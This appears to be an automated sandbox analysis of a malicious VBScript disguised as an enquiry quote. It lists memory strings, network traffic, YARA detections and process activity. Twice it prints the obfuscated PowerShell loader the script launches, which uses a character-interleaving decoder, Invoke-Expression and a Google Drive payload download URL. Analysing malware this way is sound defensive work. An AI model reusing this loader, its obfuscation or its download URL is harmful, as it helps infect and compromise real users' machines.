              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACEC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2545333721.0000000004C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACEC01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000013.00000002.2545333721.0000000004C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD09DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD068A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACEE26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8n
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3V
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3Ve
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeU
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUK
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKa
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaW
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWB
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBg
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgw
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwl
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5r
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rl
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlz
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzj
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm3
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm35
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354P
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PP
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPM
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMi
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMis
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisR
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACEE26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRUP
              Source: powershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRUXR
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1D8nk3VeUKaWBgwlG5rlzjm354PPMisRU&export=download
              Source: powershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD09E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 0000000F.00000002.2546103822.000001FAD09E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.7:49707 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_3024.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3024, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5168
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5168
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5168Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAAC06B4F615_2_00007FFAAC06B4F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAAC06C2A215_2_00007FFAAC06C2A2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAAC13088D15_2_00007FFAAC13088D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_04A8F1F019_2_04A8F1F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_04A8FAC019_2_04A8FAC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_04A8EEA819_2_04A8EEA8
              Source: Enquiry Quote - 24071834-01.vbsInitial sample: Strings found which are bigger than 50
              Source: amsi32_3024.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3024, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/8@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Woes.udsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmb5p4uc.t0y.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8084
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3024
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Enquiry Quote - 24071834-01.vbsVirustotal: Detection: 9%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If (${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For( $candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric ' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk .erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric 'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm =,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes ,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80 = Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale (Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric ' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd 